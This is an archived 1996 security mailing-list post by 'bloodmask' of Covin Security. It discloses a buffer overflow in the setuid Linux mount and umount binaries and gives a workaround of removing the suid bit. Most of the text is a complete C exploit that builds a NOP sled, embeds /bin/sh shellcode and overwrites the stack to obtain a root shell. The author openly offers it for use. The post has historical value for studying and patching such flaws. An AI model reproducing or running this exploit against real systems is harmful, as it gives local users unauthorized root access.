TUCoPS :: Linux :: Discontinued :: linux_mo.txt

Vulnerability in all known Linux distributions


                 Vulnrability in all known Linux distributions
                                       
   bloodmask (bloodmask@mymail.com)
   Tue, 13 Aug 1996 07:04:25 +0200
   
Greetings,

Well folks, After all the other security issues in Linux, I can't say
I'm really that shocked about this one, anyway, read the officail covin
release. After finding this one, we at covin decided it's time to put
and end to this issue, and we've begun scanning all of Linux's suid
binaries for other hints of these hidden "features", Results will be
released soon. The reason we are also releasing the exploit, an act
which may seem highly inresponsable, is due to previous expieriance that
making the exploit widely available, ussually speeds up the proccess of
patching up stupid vulnerabilities like these.


BTW, This is kind of out of topic, but I figure, there's nothing wrong
with killing two birds with one stone... Ijust noticed when installing
the latest version of the shadow suite, taken from sunsite, that it
"unpatched" the lib enviorment vulnerability on my system. I haven't had
the time to determine *HOW* it exposed my system, but it would be wise
to check up on this matter.

--------------2F3F790C537451604439D8BF
Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="cvnmount.exploit"

Covin Security Releases:
(mount bufferoverflow exploit v1.0)

Tested operated systems: All current distributions of Linux

Affect: Local users on systems affected can gain overflow mounts syntax
buffer and execute a shell by overwriting the stack.

Affected binaries:
(/bin/mount and /bin/umount)

Workaround:
On all current distributions of Linux remove suid bit of /bin/mount and
/bin/umount.
[chmod -s /bin/mount;chmod -s /bin/umount]

Remarks:
For gods sake, how many more times are we gonna see this kind of problem?
It's been with Linux since it's very beggining, and it's so easy to
exploit. Similiar buffer overflow vulnerabilities have been found in
Linux distributions many times before, splitvt, dip, just to name a few
examples.


Any remarks, notes or other forms of feedback may be redirected to:
bloodmask@mymail.com
<------------------------------[ Cut here ]---------------------------------->

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH